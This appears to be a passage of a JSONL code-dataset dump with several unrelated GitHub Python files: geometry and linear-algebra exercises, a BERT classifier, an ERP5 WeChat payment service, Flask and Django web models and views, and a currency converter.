linear regression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12802387137","text":"\nimport math\nimport copy\n\n# Một class để biểu diễn một Điểm trong mặt phẳng 2D\n\n\nclass Point():\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n# Tìm khoảng cách giữa 2 điểm\n\n\ndef dist(p1, p2):\n return math.sqrt((p1.x - p2.x) *\n (p1.x - p2.x) +\n (p1.y - p2.y) *\n (p1.y - p2.y))\n\n# Hàm BruteForce để trả về\n# khoảng cách nhỏ nhất giữa hai điểm\n# trong P [] có kích thước n\n\n\ndef bruteForce(P, n):\n min_val = float('inf')\n for i in range(n):\n for j in range(i + 1, n):\n if dist(P[i], P[j]) < min_val:\n min_val = dist(P[i], P[j])\n\n return min_val\n\n# Hàm tìm khoảng cách giữa các điểm gần nhất của dải có kích thước nhất định.\n# Tất cả các điểm trong dải mảng được sắp xếp theo tọa độ y.\n# Tất cả chúng đều có giới hạn trên,\n# trên khoảng cách tối thiểu là d\n\n\ndef stripClosest(strip, size, d):\n min_val = d # Khởi tạo khoảng cách tối thiểu là d\n # Lặp lần lượt tất cả các điểm và\n # thử các điểm tiếp theo cho đến khi chênh lệch giữa các tọa độ y nhỏ hơn d\n for i in range(size):\n j = i + 1\n while j < size and (strip[j].y -\n strip[i].y) < min_val:\n min_val = dist(strip[i], strip[j])\n j += 1\n\n return min_val\n\n# Hàm đệ quy để tìm khoảng cách nhỏ nhất.\n# Mảng P chứa tất cả các điểm được sắp xếp theo tọa độ x\n\n\ndef closestUtil(P, Q, n):\n\n if n <= 3:\n return bruteForce(P, n)\n\n # Tìm điểm ở giữa\n mid = n // 2\n midPoint = P[mid]\n\n Pl = P[:mid]\n Pr = P[mid:]\n\n # Xét đường thẳng đứng đi qua điểm giữa,\n # Tính khoảng cách nhỏ nhất dl ở bên trái của điểm giữa và dr ở bên phải\n dl = closestUtil(Pl, Q, mid)\n dr = closestUtil(Pr, Q, n - mid)\n\n # Tìm min dr và dl\n d = min(dl, dr)\n # Xây dựng một mảng stripP[] chứa điểm gần (gần hơn d) với đường thẳng đi qua điểm giữa\n stripP = []\n stripQ = []\n lr = Pl + Pr\n for i in range(n):\n if abs(lr[i].x - midPoint.x) < d:\n stripP.append(lr[i])\n if abs(Q[i].x - midPoint.x) < d:\n stripQ.append(Q[i])\n\n stripP.sort(key=lambda point: point.y) # <-- REQUIRED\n min_a = min(d, stripClosest(stripP, len(stripP), d))\n min_b = min(d, stripClosest(stripQ, len(stripQ), d))\n\n return min(min_a, min_b)\n\n# Hàm chính tìm khoảng cách nhỏ nhất.\n\n\ndef closest(P, n):\n P.sort(key=lambda point: point.x)\n Q = copy.deepcopy(P)\n Q.sort(key=lambda point: point.y)\n\n return closestUtil(P, Q, n)\n\n\nP = [Point(2, 3), Point(12, 30),\n Point(40, 50), Point(5, 1),\n Point(12, 10), Point(3, 4)]\nn = len(P)\nprint(\"Khoảng cách nhỏ nhất là\",\n closest(P, n))\n","repo_name":"triandn/Applied-Mathematics","sub_path":"OntapCK/Chuong2-HinhHoc/minLengthTwoPoint.py","file_name":"minLengthTwoPoint.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72763129523","text":"import torch\nimport torch.nn as nn\nfrom transformers import BertModel\n\n\nclass BertClassifier(nn.Module):\n def __init__(self, hidden_dim=512, dropout=0.5):\n super(BertClassifier, self).__init__()\n self.bert = BertModel.from_pretrained(\"bert-base-uncased\")\n self.linear = nn.Linear(768, hidden_dim)\n self.dropout = nn.Dropout(dropout)\n \n def forward(self, data: dict):\n bert_out = self.bert(**data)[1]\n return self.dropout(self.linear(bert_out))\n \n \n \nif __name__ == \"__main__\":\n data = torch.load(\"data/test_txt.pt\")\n for k in data.keys():\n data[k] = torch.tensor(data[k])[:5]\n model = BertClassifier(3)\n print(model(data).shape)\n print(model)\n ","repo_name":"XDxc-cuber/Multi-model","sub_path":"codes/models/BertClassifier.py","file_name":"BertClassifier.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71249110963","text":"import zope\nfrom AccessControl import ClassSecurityInfo\nfrom Products.ERP5Type import Permissions, PropertySheet\nfrom Products.ERP5Type.XMLObject import XMLObject\nfrom zLOG import LOG, WARNING\nimport random, string, hashlib, urllib2, socket\nfrom urlparse import urlparse\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\n\n\nclass WechatException(Exception):\n def __init__(self, msg):\n super(WechatException, self).__init__(msg)\n\nfrom erp5.component.interface.IPaymentService import IPaymentService\n@zope.interface.implementer(IPaymentService)\nclass WechatService(XMLObject):\n meta_type = 'Wechat Service'\n portal_type = 'Wechat Service'\n\n ORDER_URL = \"/pay/unifiedorder\" # Wechat unified order API\n QUERY_URL = \"/pay/orderquery\"\n\n # Declarative security\n security = ClassSecurityInfo()\n security.declareObjectProtected(Permissions.AccessContentsInformation)\n\n # Declarative properties\n property_sheets = ( PropertySheet.Base\n , PropertySheet.XMLObject\n , PropertySheet.Reference\n )\n\n def generateRandomStr(self, random_length=24):\n alpha_num = string.ascii_letters + string.digits\n random_str = ''.join(random.choice(alpha_num) for i in range(random_length))\n return random_str\n\n\n def calculateSign(self, dict_content, key):\n # Calculate the sign according to the data_dict\n # The rule was defined by Wechat (Wrote in Chinese):\n # https://pay.weixin.qq.com/wiki/doc/api/native.php?chapter=4_3\n\n # 1. Sort it by dict order\n params_list = sorted(dict_content.items(), key=lambda e: e[0], reverse=False)\n # 2. Concatenate the list to a string\n params_str = \"&\".join(u\"{}={}\".format(k, v) for k, v in params_list)\n # 3. Add trade key in the end\n params_str = params_str + '&key=' + key\n\n md5 = hashlib.md5() # Use MD5 mode\n md5.update(params_str.encode('utf-8'))\n sign = md5.hexdigest().upper()\n return sign\n\n\n def convert_xml_to_dict(self, xml_content):\n '''\n The XML returned by Wechat is like:\n \n \n \n \n \n \n \n \n \n \n \n \n '''\n try:\n t = ET.XML(xml_content)\n except ET.ParseError:\n return {}\n else:\n dict_content = dict([(child.tag, child.text) for child in t])\n return dict_content\n\n\n def convert_dict_to_xml(self, d):\n xml = ''\n for key, value in d.items():\n if isinstance(value, basestring):\n xml += '<{0}>'.format(key, value)\n else:\n xml += '<{0}>{1}'.format(key, value)\n xml += ''\n return xml\n\n\n def getSandboxKey(self):\n SANDBOX_KEY_URL = self.getLinkUrlString() + \"/sandboxnew/pay/getsignkey\"\n params = {}\n params['mch_id'] = self.getServiceMchId()\n params['nonce_str'] = self.generateRandomStr()\n params['sign'] = self.calculateSign(params, self.getServiceApiKey())\n LOG('WechatService', WARNING,\n \"getSandboxKey : data = %s SANDBOX_KEY_URL = %s\" % (self.convert_dict_to_xml(params), SANDBOX_KEY_URL), error=False)\n result = urllib2.Request(SANDBOX_KEY_URL, data=self.convert_dict_to_xml(params))\n result_data = urllib2.urlopen(result)\n result_read = result_data.read()\n result_dict_content = self.convert_xml_to_dict(result_read)\n return_code = result_dict_content.get('return_code', '')\n if return_code==\"SUCCESS\":\n result_msg = result_dict_content['return_msg']\n if result_msg==\"ok\":\n sandbox_signkey = result_dict_content['sandbox_signkey']\n return sandbox_signkey\n raise Exception(result_dict_content['result_msg'].encode('utf-8'))\n raise Exception(\"Get sanbox key failed: \" + str(result_dict_content))\n\n def callWechatApi(self, URL, wechat_dict):\n portal = self.getPortalObject()\n wechat_url = self.getLinkUrlString()\n if self.getWechatMode() == \"SANDBOX\":\n key = self.getSandboxKey()\n elif self.getWechatMode() == \"UNITTEST\":\n return {\"result_code\": 'SUCCESS', \"code_url\": 'weixin://wxpay/bizpayurl?pr=AAAAA'}\n else:\n key = self.getServiceApiKey()\n nonce_str = self.generateRandomStr()\n\n wechat_spbill_create_ip = self.getWechatSpbillCreateIp()\n if not wechat_spbill_create_ip:\n base_url = portal.absolute_url()\n result = urlparse(base_url)\n spbill_create_ip = socket.gethostbyname(result.netloc)\n else:\n spbill_create_ip = socket.gethostbyname(wechat_spbill_create_ip)\n\n # Construct parameter for calling the Wechat payment URL\n wechat_dict['appid'] = self.getServiceAppid()\n wechat_dict['mch_id'] = self.getServiceMchId()\n wechat_dict['nonce_str'] = nonce_str\n if self.getWechatMode() == \"SANDBOX\":\n # This is for sandbox test, sandbox need the total_fee equal to 101 exactly\n wechat_dict['total_fee'] = 101 # unit is Fen, 1 CNY = 100 Fen\n wechat_url += \"/sandboxnew\"\n wechat_dict['spbill_create_ip'] = spbill_create_ip\n\n # generate signature\n wechat_dict['sign'] = self.calculateSign(wechat_dict, key)\n\n LOG('callWechatApi', WARNING,\n \"data = %s URL = %s\" % (self.convert_dict_to_xml(wechat_dict), wechat_url + URL), error=False)\n # send data\n result = urllib2.Request(wechat_url + URL, data=self.convert_dict_to_xml(wechat_dict))\n result_data = urllib2.urlopen(result)\n result_read = result_data.read()\n result_dict_content = self.convert_xml_to_dict(result_read)\n return_code = result_dict_content['return_code']\n if return_code==\"SUCCESS\":\n return result_dict_content\n else:\n raise Exception(u\"ERROR could not communicate with Wechat (return_code {}: {})\".format(return_code, result_dict_content.get(\"return_msg\")))\n\n def getWechatPaymentURL(self, wechat_dict):\n portal = self.getPortalObject()\n base_url = portal.absolute_url()\n notify_url = base_url + \"/ERP5Site_receiveWechatPaymentCallback\" # Wechat payment callback method\n wechat_dict['notify_url'] = notify_url\n wechat_dict['trade_type'] = \"NATIVE\"\n wechat_answer = self.callWechatApi(self.ORDER_URL, wechat_dict)\n result_code = wechat_answer['result_code']\n if result_code==\"SUCCESS\":\n return wechat_answer['code_url']\n else:\n raise Exception(u\"ERROR Wechat notified a problem (result_code {}: {})\".format(result_code, wechat_answer.get(\"err_code_des\")))\n\n def queryWechatOrderStatus(self, wechat_dict):\n '''\n documentation(Chinese): https://pay.weixin.qq.com/wiki/doc/api/native.php?chapter=9_2\n The dict_content atleast should contains one of following:\n - transaction_id (str): wechat order number, use this in higher priority, it will return in the payment notify callback\n - out_trade_no(str): The order ID used inside ERP5, less than 32 characters, digits, alphabets, and \"_-|*@\", unique in ERP5\n '''\n if \"transaction_id\" not in wechat_dict and \"out_trade_no\" not in wechat_dict:\n raise WechatException(\"transaction_id or out_trade_no is needed for query the Wechat Order\")\n\n return self.callWechatApi(self.QUERY_URL, wechat_dict)\n\n def receiveWechatPaymentNotify(self, request, *args, **kwargs):\n '''\n Receive the asychonized callback send by Wechat after user pay the order.\n Wechat will give us something like:\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 1\n \n \n \n '''\n\n wechat_account_configuration = self.ERP5Site_getWechatPaymentConfiguration()\n params = self.convert_xml_to_dict(request.body)\n\n if params.get(\"return_code\") == \"SUCCESS\":\n # Connection is ok\n sign = params.pop('sign')\n recalcualted_sign = self.calculateSign(params, wechat_account_configuration['API_KEY'])\n if recalcualted_sign == sign:\n if params.get(\"result_code\", None) == \"SUCCESS\": # payment is ok\n # order number\n # out_trade_no = params.get(\"out_trade_no\")\n # Wechat payment order ID\n # This is what we should use when we search the order in the wechat\n # transaction_id = params.get(\"out_trade_no\")\n # Save the wechat payment order ID in somewhere.\n # We recevied the payment...\n # Process something\n # XXX: display the page the payment received.\n # container.REQUEST.RESPONSE.redirect(\"%s/#wechat_payment_confirmed\")\n # We must tell Wechat we received the response. Otherwise wechat will keep send it within 24 hours\n # xml_str = convert_dict_to_xml({\"return_code\": \"SUCCESS\"})\n # return container.REQUEST.RESPONSE(xml_str)\n return '''\n \n \n \n \n '''\n else:\n print(u\"{0}:{1}\".format(params.get(\"err_code\"), params.get(\"err_code_des\")))\n else:\n # Error information\n print(params.get(\"return_msg\").encode(\"utf-8\"))\n\n def initialize(self, REQUEST=None, **kw):\n \"\"\"See Payment Service Interface Documentation\"\"\"\n pass\n\n def navigate(self, wechat_dict, REQUEST=None, **kw):\n \"\"\"Returns a redirection to the payment page\"\"\"\n LOG('WechatService', WARNING,\n 'In Navigate', error=False)\n\n portal = self.getPortalObject()\n base_url = wechat_dict.pop('base_url', '%s/#wechat_payment' % portal.absolute_url())\n\n return self.REQUEST.RESPONSE.redirect(\n \"%s?trade_no=%s&price=%s&payment_url=%s\" % (\n base_url,\n wechat_dict['out_trade_no'],\n wechat_dict['total_fee'],\n self.getWechatPaymentURL(wechat_dict)\n )\n )\n\n def notifySuccess(self, REQUEST=None, **kw):\n \"\"\"See Payment Service Interface Documentation\"\"\"\n raise NotImplementedError\n\n def notifyFail(self, REQUEST=None, **kw):\n \"\"\"See Payment Service Interface Documentation\"\"\"\n raise NotImplementedError\n\n def notifyCancel(self, REQUEST=None, **kw):\n \"\"\"See Payment Service Interface Documentation\"\"\"\n raise NotImplementedError\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_wechat_secure_payment/DocumentTemplateItem/portal_components/document.erp5.WechatService.py","file_name":"document.erp5.WechatService.py","file_ext":"py","file_size_in_byte":11300,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"6746887709","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash \nfrom flask_app.models import user\nmydb = 'recipe_schema'\n\nclass Recipe:\n def __init__(self, data):\n self.id = data['id']\n self.name = data['name']\n self.under = data['under']\n self.description = data['description']\n self.instructions = data['instructions']\n self.date_cooked = data['date_cooked']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.creator = None\n\n @classmethod\n def save(cls, data):\n query = \"INSERT INTO recipes (name, under, description, instructions, date_cooked, created_at, updated_at, user_id) VALUES (%(name)s, %(under)s, %(description)s, %(instructions)s, %(date)s, NOW(), NOW(), %(user_id)s);\"\n results = connectToMySQL(mydb).query_db(query, data)\n # print(results)\n return results\n\n @classmethod\n def get_all_recipes_with_creator(cls):\n query = \"SELECT * FROM recipes JOIN users ON recipes.user_id = users.id;\"\n results = connectToMySQL(mydb).query_db(query)\n # print(results)\n recipes = []\n for recipe in results:\n one_recipe = cls(recipe)\n one_recipe_author_info = {\n 'id' : recipe['users.id'],\n 'first_name' : recipe['first_name'],\n 'last_name' : recipe['last_name'],\n 'email' : recipe['email'],\n 'password' : recipe['password'],\n 'created_at' : recipe['users.created_at'],\n 'updated_at' : recipe['users.updated_at']\n }\n author = user.User(one_recipe_author_info)\n one_recipe.creator = author\n recipes.append((one_recipe))\n return recipes\n\n @classmethod\n def getByID(cls, data):\n query = \"SELECT * FROM recipes WHERE id = %(recipe_id)s;\"\n results = connectToMySQL(mydb).query_db(query, data)\n print(results)\n return cls(results[0]) \n\n @classmethod\n def getByID_w_user(cls, data):\n query = \"SELECT recipes.*, users.first_name AS username FROM recipes JOIN users ON recipes.user_id = users.id WHERE recipes.id = %(recipe_id)s;\"\n results = connectToMySQL(mydb).query_db(query, data)\n this_post = cls(results[0])\n this_post.creator = results[0]['username']\n return this_post\n\n @classmethod\n def update(cls, data):\n query = \"UPDATE recipes SET name = %(name)s, under = %(under)s, description = %(description)s, instructions = %(instructions)s, date_cooked = %(date_cooked)s, updated_at = CURRENT_TIMESTAMP WHERE id = %(recipe_id)s;\"\n return connectToMySQL(mydb).query_db(query, data)\n\n @classmethod\n def delete(cls, data):\n query = \"DELETE FROM recipes WHERE id = %(recipe_id)s;\"\n return connectToMySQL(mydb).query_db(query, data)\n\n\n @staticmethod\n def validate_recipe(user): \n is_valid = True\n if len(user['name']) < 1: \n flash(\"must enter a name\")\n is_valid = False \n elif len(user['name']) < 2:\n flash('Recipe name must be longer than two characters')\n is_valid = False\n if len(user['description']) < 1:\n flash(\"must enter a description\")\n is_valid = False\n elif len(user['description']) < 2:\n flash('description must be longer than two characters')\n is_valid = False\n if len(user['instructions']) < 1: \n flash(\"must enter instructions\")\n is_valid = False \n elif len(user['instructions']) < 2:\n flash('instructions must be longer than two characters')\n is_valid = False\n if len(user['date']) < 1: \n flash(\"must enter a date\")\n is_valid = False \n return is_valid","repo_name":"svonrickenbach/Coding-Dojo","sub_path":"python/flask_mysql/crud/recipes/flask_app/models/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35612868908","text":"from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db import connection\nfrom django.db.models import Count\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.utils import simplejson as json\n\nfrom ui.models import Bike, Station, Ride, Event\n\n\ndef home(request):\n qs_rides = Event.objects.values('bike', 'bike__num')\n qs_rides = qs_rides.annotate(Count('bike'))\n qs_rides = qs_rides.order_by('-bike__count')\n qs_stations = Event.objects.values('station', 'station__desc')\n qs_stations = qs_stations.annotate(Count('station'))\n qs_stations = qs_stations.order_by('-station__count')\n return render(request, 'home.html', {\n 'title': 'home',\n 'rides': qs_rides[:50],\n 'stations': qs_stations[:50],\n })\n\n\ndef _paginate(request, paginator):\n page = request.GET.get('page')\n try:\n items = paginator.page(page)\n except PageNotAnInteger:\n items = paginator.page(1)\n except EmptyPage:\n items = paginator.page(paginator.num_pages)\n return page, items\n\n\ndef bike(request, bike_id):\n bike = get_object_or_404(Bike, id=bike_id)\n count = bike.events.count() / 2\n if count > 0:\n first = bike.events.order_by('date')[0]\n else:\n first = None\n longest = Ride.objects.raw('''\n SELECT *, MAX(date_end - date_start) AS the_max\n FROM ui_ride\n WHERE bike_id=%s\n GROUP BY id\n ORDER BY the_max DESC\n LIMIT 1''', [bike.id])\n paginator = Paginator(bike.events.order_by('-date'), 50)\n page, events = _paginate(request, paginator)\n return render(request, 'bike.html', {\n 'title': 'bike %s' % bike.num,\n 'bike': bike,\n 'events': events,\n 'count': count,\n 'first': first,\n 'longest': longest[0],\n })\n\n\ndef station(request, station_id):\n station = get_object_or_404(Station, id=station_id)\n paginator = Paginator(station.events.order_by('-date'), 50)\n page, events = _paginate(request, paginator)\n first = events[0]\n return render(request, 'station.html', {\n 'title': station.desc,\n 'station': station,\n 'events': events,\n 'first': first,\n })\n\n\ndef station_stats(request, station_id):\n station = get_object_or_404(Station, id=station_id)\n count = station.events.count()\n first = station.events.order_by('date')[0]\n return render(request, 'station_stats.html', {\n 'title': station.desc,\n 'station': station,\n 'count': count,\n 'first': first,\n })\n\n\ndef station_monthly_summary_json(request, station_id):\n station = get_object_or_404(Station, id=station_id)\n cursor = connection.cursor()\n cursor.execute('''\n SELECT TO_CHAR(date, 'YYYY-MM') AS yearmonth, COUNT(*) AS ecount,\n is_end\n FROM ui_event\n WHERE station_id=%s\n GROUP BY yearmonth, is_end\n ORDER BY yearmonth, is_end''', [station.id])\n monthly_summary = []\n row = cursor.fetchone()\n d = {}\n while row:\n if row[2]:\n # some rides end slightly into the next quarter, leaving\n # a dangling ends row with no matching row w/starts\n try:\n d['end'] = row[1]\n except:\n d = {'end': row[1], 'month': row[0], 'start': 0}\n d['total'] = d['start'] + d['end']\n # eliminate minimal data\n if d['total'] > 5:\n monthly_summary.append(d)\n d = None\n else:\n d = {'month': row[0], 'start': row[1]}\n row = cursor.fetchone()\n return HttpResponse(json.dumps(monthly_summary),\n content_type='application_json')\n\n\ndef from_to_station(request, station_start_id, station_end_id):\n station_start = get_object_or_404(Station, id=station_start_id)\n station_end = get_object_or_404(Station, id=station_end_id)\n qs_rides = station_start.rides_start.filter(station_end=station_end)\n count = qs_rides.count()\n first = qs_rides.order_by('date_start')[0]\n paginator = Paginator(qs_rides.order_by('-date_start'), 50)\n page, rides = _paginate(request, paginator)\n return render(request, 'from_to_station.html', {\n 'title': 'from %s to %s' % (station_start.desc, station_end.desc),\n 'station_start': station_start,\n 'station_end': station_end,\n 'rides': rides,\n 'count': count,\n 'first': first,\n })\n","repo_name":"dchud/bikestat","sub_path":"bikestat/ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29959599800","text":"import sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(x, y):\n global check\n if not((0 <= x < N) and (0 <= y < M)) or (field[x][y] == \"H\"):\n return 0\n if visited[x][y]:\n check = True\n return -1\n if dp[x][y] != -1:\n return dp[x][y]\n\n visited[x][y] = True\n for i in range(4):\n nx = x + (dx[i] * int(field[x][y]))\n ny = y + (dy[i] * int(field[x][y])) \n dp[x][y] = max(dp[x][y], dfs(nx, ny)+1)\n if check:\n return -1 \n visited[x][y] = False\n\n return dp[x][y] \n\nif __name__ == '__main__':\n N, M = map(int, sys.stdin.readline().split())\n field = [list(sys.stdin.readline().rstrip()) for _ in range(N)]\n\n dx = [0, 0, -1, 1]\n dy = [1, -1, 0, 0]\n\n visited = [[False] * M for _ in range(N)]\n dp = [[-1] * M for _ in range(N)]\n check = False\n\n print(dfs(0,0))","repo_name":"jey07258/AlgorithmStudy","sub_path":"DP/BJ1103.py","file_name":"BJ1103.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34410479176","text":"import json\nimport os\nimport time\n\nwith open(\"file.json\", encoding='utf-8') as js:\n data = json.load(js)\n\n USDBRL = data['USDBRL']\n EURBRL = data['EURBRL']\n BTCBRL = data['BTCBRL']\n\n\ndef start():\n print(\"----------------------\")\n print(\"REALIZAR SUA CONVERSÃO\")\n print(\"----------------------\")\n a = input(\"...PRESSIONE ENTER....\")\n try:\n if a == \"\":\n print(\"------------------\")\n print(\"OQUE DESEJA FAZER?\")\n res = input(\n \"[1]REALIZAR COTAÇÕES\\n[2]VER INFORMAÇÕES DE MOEDAS\\n[3]SAIR\\n: \")\n if res == '1':\n cotacao()\n elif res == '2':\n info()\n elif res == '3':\n os.system('cls')\n else:\n os.system('cls')\n print(\"PRECISA ESCOLHER UMAS DAS OPÇÕES\")\n else:\n print(\"PRECISA DAR UM ENTER\")\n except:\n os.system('cls')\n print(\"erro\")\n\n\ndef info():\n os.system('cls')\n while True:\n print(\"-----------------------------------\")\n print(\"ESCOLHA UM DAS COTAÇÕES DISPONIVEIS\")\n print(\"[1]USDBRL\\n[2]EURBRL\\n[3]BTCBRL\")\n answer = int(input(\": \"))\n\n try:\n if answer == 1:\n print(f\"Nome: {USDBRL['name']}\\nCotação: {USDBRL['bid']}\\nCode: {USDBRL['code']}\\nCodeIn: {USDBRL['codein']}\")\n time.sleep(1)\n answer_r = input(\n \"DESEJA VER INFORMAÇÕES DE OUTRAS MOEDAS?(s/n)\\n: \").lower().strip()[0]\n if answer_r == 's':\n info()\n elif answer_r == 'n':\n break\n else:\n print(\"DIGITE UMA RESPOSTA CONCRETA!\")\n elif answer == 2:\n print(f\"Nome: {EURBRL['name']}\\nCotação: {EURBRL['bid']}\\nCode: {EURBRL['code']}\\nCodeIn: {EURBRL['codein']}\")\n time.sleep(1)\n answer_r = input(\n \"DESEJA VER INFORMAÇÕES DE OUTRAS MOEDAS?(s/n)\\n: \").lower().strip()[0]\n if answer_r == 's':\n info()\n elif answer_r == 'n':\n break\n else:\n print(\"DIGITE UMA RESPOSTA CONCRETA!\")\n elif answer == 3:\n print(f\"Nome: {BTCBRL['name']}\\nCotação: {BTCBRL['bid']}\\nCode: {BTCBRL['code']}\\nCodeIn: {BTCBRL['codein']}\")\n time.sleep(1)\n answer_r = input(\n \"DESEJA VER INFORMAÇÕES DE OUTRAS MOEDAS?(s/n)\\n: \").lower().strip()[0]\n if answer_r == 's':\n info()\n elif answer_r == 'n':\n break\n else:\n print(\"NÃO ENTENDI\")\n else:\n print(\"DIGITE UMA RESPOSTA CONCRETA!\")\n except:\n print(\"ERROR\")\n\n\ndef cotacao():\n while True:\n value_to_be_quoted = float(input(\"Digite o valor a ser cotado: \"))\n ab = int(input(\"ESCOLHA UMA DAS OPÇÕES ABAIXO\\n[1]USDBRL\\n[2]EURBRL\\n[3]BTCBRL\\n[4]OU VER INFORMAÇÕES SOBRE AS MOEDAS\\n: \"))\n try:\n if ab == 1:\n r = value_to_be_quoted\n t = float(USDBRL['bid'])\n l = r/t\n print(f\"COTAÇÃO ATUAL DO BRL -> USD: {l:.2f}\")\n time.sleep(1)\n exit = input(\"DESEJA VER OUTRA COTAÇÃO?(s/n)\\n: \").lower().strip()[0]\n if exit == 's':\n os.system('cls')\n continue\n elif exit == 'n':\n os.system('cls')\n break\n elif ab == 2:\n r = value_to_be_quoted\n t = float(EURBRL['bid'])\n l = r/t\n print(f\"COTAÇÃO ATUAL DO BRL -> EUR: {l:.2f}\")\n time.sleep(1)\n exit = input(\"DESEJA VER OUTRA COTAÇÃO?(s/n)\\n: \").lower().strip()[0]\n if exit == 's':\n os.system('cls')\n continue\n elif exit == 'n':\n os.system('cls')\n break\n elif ab == 3:\n r = value_to_be_quoted\n t = float(BTCBRL['bid'])\n l = r/t\n print(f\"COTAÇÃO ATUAL DO BRL -> BTC: {l:.2f}\")\n exit = input(\"DESEJA VER OUTRA COTAÇÃO?(s/n)\\n: \").lower().strip()[0]\n if exit == 's':\n os.system('cls')\n continue\n elif exit == 'n':\n os.system('cls')\n break\n elif ab == 4:\n os.system('cls')\n start()\n else:\n os.system('cls')\n info()\n except Exception as error:\n os.system('cls')\n print(\"ESCOLHA UMA DAS OPÇÕES\", error)\nstart()","repo_name":"WilliamRodri/python-exercises","sub_path":"converso_de_moedas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73279151601","text":"#Exercise 4: Remove first n characters from a string\n#Write a program to remove characters from a string starting from zero up to n and return a new string.\n\n#Entry string, independent if is word or phrase.\nstring = input(\"Type a word or a phrase: \")\n\n#Require to user how many character wish to remove from start\nn = int(input(\"How many characters do you wish remove? \"))\n\n#slice string - [start:end:step]\nnewString = string[n:]\n\nprint(newString)","repo_name":"cvoznak/Exercises","sub_path":"Python/PYnative/BasicExerciseForBeginners/removeCharStrg.py","file_name":"removeCharStrg.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36530185883","text":"'''\nAssume you want to create a dictionary object that maps keys to more than one values i.e. a Multivalued Dict\n'''\n\n#A dictionary object by default allows only one key to be assigned to a particular value at a time\n#If one wants to add multiple values to a dictionary key, it will more probably be like\n\nclass MultivaluedDict():\n \n def __init__(self):\n self.dictionary = {}\n \n def createKey(self, key_pairs): \n for key, values in key_pairs:\n if key not in self.dictionary:\n self.dictionary[key] = []\n self.dictionary[key].append(values)\n \n def __repr__(self):\n return '{}'.format(self.dictionary)\n \n#Now running this function on a set of pair one by one\nd = MultivaluedDict()\npairs = [('First', 30), ('Second',40), ('Third',50), ('First', 80), ('Third',70)]\nd.createKey(pairs)\nprint(d)\n\n#Although this is the correct method, there are alternate and more efficient ways to perform this task\n#For instance, the Collections module provides us with a function defaultDict() that allows to create Multi-valued Dictionaries for properly\n\nfrom collections import defaultdict\n\nnew_d = defaultdict(list)\nnew_d['First'].append(30)\nnew_d['Second'].append(50)\nnew_d['Third'].append(70)\nnew_d['First'].append(30)\nnew_d['Third'].append(70)\n\nprint(new_d)\n\n#Another method we can use is the setdefault method on the normal dictionary object\n\nnewer_d = {}\nnewer_d.setdefault('First', []).append(30)\nnewer_d.setdefault('Second', []).append(50)\nnewer_d.setdefault('Third', []).append(70)\nnewer_d.setdefault('First', []).append(30)\nnewer_d.setdefault('Third', []).append(70)\n\nprint(newer_d)","repo_name":"Hassan-Farid/PyTech-Review","sub_path":"Python Intermediate/Sequences and Iterables/Mapping Multiple Values to Dict.py","file_name":"Mapping Multiple Values to Dict.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"33467152748","text":"import numpy as np\nimport math\n\n# A = np.array([[1, 0], [1, 1], [0, 1]])\n# A = np.array([[1, 0], [1, 1], [1, 1]])\nA = np.array([[0, 1], [2, 3], [4, 5]])\n# A = np.array([[3, 2], [1, 5], [1, 0]])\n# A = np.array([[3, 2], [1, 5]])\n\n\ndef dlugosc(vector):\n result = 0\n for i in range(len(vector)):\n result += vector[i]**2\n return math.sqrt(result)\n\n\ndef projekcja(u, v):\n l = np.dot(v.T, u)\n m = np.dot(u.T, u)\n return (l/m)*u\n\n\ndef dekompozycja(A):\n Q = []\n v1 = []\n v2 = []\n for i in range(len(A)):\n v1.append(A[i][0])\n v2.append(A[i][1])\n u1 = np.array(v1)\n v2 = np.array(v2)\n e1 = u1/dlugosc(u1)\n Q.append(e1)\n u2 = v2 - projekcja(u1, v2)\n e2 = u2/dlugosc(u2)\n Q.append(e2)\n Q = np.array(Q)\n return np.array(Q.T)\n\n\nQ = dekompozycja(A)\nR = np.round(np.dot(Q.T, A), decimals=5)\nwynik = np.round(np.dot(Q, R), decimals=5)\n\n\ndef a_plus_k(A, k):\n Q = dekompozycja(A)\n if len(A) == len(A[0]):\n for i in range(k):\n Q = dekompozycja(A)\n R = np.round(np.dot(Q.T, A), decimals=5)\n A = np.round(np.dot(R, Q), decimals=5)\n return A\n\n\ndef wartosci_wlasne(A):\n new_A = A\n while (np.diag(new_A) - np.dot(new_A, np.ones((len(new_A), 1))).T).all() > 0.001:\n new_A = a_plus_k(new_A, 1)\n return np.diag(new_A)\n\n\n# ak = a_plus_k(A, 10)\nprint(A)\nprint(Q)\n# print(R)\n# print(wynik)\n# print(ak)\n# wynik = 